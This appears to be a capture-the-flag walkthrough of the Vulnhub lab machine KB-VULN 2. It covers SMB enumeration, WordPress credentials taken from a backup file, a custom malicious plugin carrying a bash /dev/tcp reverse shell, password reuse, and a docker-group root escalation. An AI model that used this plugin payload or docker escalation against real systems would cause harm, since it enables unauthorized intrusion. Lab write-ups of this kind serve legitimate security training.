Vulnhub - KB-VULN 2

You can find the machine there > KB-VULN 2

Summary

Time for the part 2 haha :P We start by finding a backup file using SMB, this file gives us some creds for wordpress. We login in and we get reverse shell, first privesc is simple we can use the same password and privesc to root is a simple docker exploitation. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ ip=192.168.1.20
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 15:44 EEST
Nmap scan report for kb-server.zte.com.cn (192.168.1.20)
Host is up (0.00048s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:56:FE:62 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.54 seconds
$ nmap -p 21,22,80,139,445 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 15:44 EEST
Nmap scan report for kb-server.zte.com.cn (192.168.1.20)
Host is up (0.00039s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:99:01:23:fe:c4:84:ef:14:55:87:da:a3:30:6f:50 (RSA)
|   256 cb:8e:e1:b3:3a:6e:64:9e:0f:53:39:7e:18:9d:8b:3f (ECDSA)
|_  256 ec:3b:d9:53:4a:5a:f7:32:f2:3a:f7:a7:6f:31:87:52 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

Let’s start with SMB enumeration, let’s list the shares.

1
2
3
4
5
6
$ smbmap -H $ip
[+] Guest session   	IP: 192.168.1.20:445	Name: kb-server.zte.com.cn                              
        Disk                                        Permissions	Comment
	----                                               -----------	-------
	Anonymous                                         	READ ONLY	  OPEN YOUR EYES!
	IPC$                                              	NO ACCESS	  IPC Service (Samba Server 4.7.6-Ubuntu)

Let’s connect to anonymous & download the file.

1
2
3
4
5
6
7
8
9
10
11
12
$ smbclient //$ip/Anonymous
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: > ls
  .                                   D        0  Thu Sep 17 13:58:56 2020
  ..                                  D        0  Wed Sep 16 13:36:09 2020
  backup.zip                          N 16735117  Thu Sep 17 13:58:56 2020

		14380040 blocks of size 1024. 8275680 blocks available
smb: > get backup.zip
getting file \backup.zip of size 16735117 as backup.zip (83809.6 KiloBytes/sec) (average 83809.7 KiloBytes/sec)
smb: > exit

backup.zip has a .txt file and a wordpress installation folder. The .txt has some creds in:

1
2
3
$ cat remember_me.txt 
Username:admin
Password:MachineBoy141

Let’s check port 80 now, we can start with a dirb scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ dirb http://192.168.1.20/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Sep 24 15:58:13 2020
URL_BASE: http://192.168.1.20/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.20/ ----
+ http://192.168.1.20/index.html (CODE:200|SIZE:10918)                                                                                                                                  
+ http://192.168.1.20/server-status (CODE:403|SIZE:277)                                                                                                                                 
==> DIRECTORY: http://192.168.1.20/wordpress/

Nice! a wordpress site, now makes sense. Takes time to load and we endup with an error message probably virtual hosts we can see on URL this:

Let’s add it to /etc/hosts:

1
2
3
4
$ nano /etc/hosts
$ cat /etc/hosts
..data..
192.168.1.20    kb.vuln

Now we can head to /wp-admin and login with the creds we found before. admin:MachineBoy141

Shell as www-data

Now i’ll show you a way to make a custom malicious plugin for reverse shell! This will be our plugin:

1
2
3
4
5
6
7
8
9
<?php
   /*
   Plugin Name: pwned
   Version: 6.9
   Author: whoknows
   */

system("bash -c 'bash -i >& /dev/tcp/$your_ip/5555 0>&1'");
?>

Let’s zip it:

1
2
$ zip plugin.zip shell.php 
  adding: shell.php (deflated 11%)

Follow my steps:

Once you press activate plugin we get a reverse shell back! :sunglasses:

1
2
3
4
5
$ nc -lvp 5555
listening on [any] 5555 ...

www-data@kb-server:/var/www/html/wordpress/wp-admin$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@kb-server:/var/www/html/wordpress/wp-admin$ 

Shell as kbadmin

We can use the same password now to privesc to user kbadmin.

1
2
3
4
5
6
www-data@kb-server:/var/www/html/wordpress/wp-admin$ su - kbadmin
Password: MachineBoy141

kbadmin@kb-server:~$ whoami;id
kbadmin
uid=1000(kbadmin) gid=1000(kbadmin) groups=1000(kbadmin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),999(docker)

Shell as root

User kbadmin is in docker group we can simply run this and get root shell!

1
2
kbadmin@kb-server:~$ groups
kbadmin adm cdrom sudo dip plugdev lxd docker
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
kbadmin@kb-server:~$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
Unable to find image 'chrisfosterelli/rootplease:latest' locally
latest: Pulling from chrisfosterelli/rootplease
a4a2a29f9ba4: Pull complete 
127c9761dcba: Pull complete 
d13bf203e905: Pull complete 
4039240d2e0b: Pull complete 
16a91ffa6f29: Pull complete 
Digest: sha256:eb6be3ee1f9b2fd6e3ae6d4fda81a80bfdf21aad9bde6f1a5234f1baa58d4bb3
Status: Downloaded newer image for chrisfosterelli/rootplease:latest

You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read the flags:

1
2
3
4
# cat flag.txt
dc387b4cf1a4143f562dd1bdb3790ff1
# cat /home/kbadmin/user.txt
03bf4d20dac5644c75e69e40bad48db0

Good one! :smile: